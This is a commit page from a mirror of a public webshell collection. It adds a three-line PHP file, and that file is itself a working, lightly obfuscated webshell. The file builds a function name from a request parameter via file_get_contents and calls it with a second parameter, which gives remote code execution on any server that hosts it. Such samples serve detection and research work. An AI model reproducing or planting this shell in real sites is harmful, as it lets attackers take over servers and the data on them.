1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
tennc
2022-09-09 23:15:37 +08:00
committed by GitHub
parent 35d39e031c
commit 9691e652c2

3
php/2022-09-09-05.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
$q=$_GET[1];
file_get_contents("php".$q)($_GET[2]);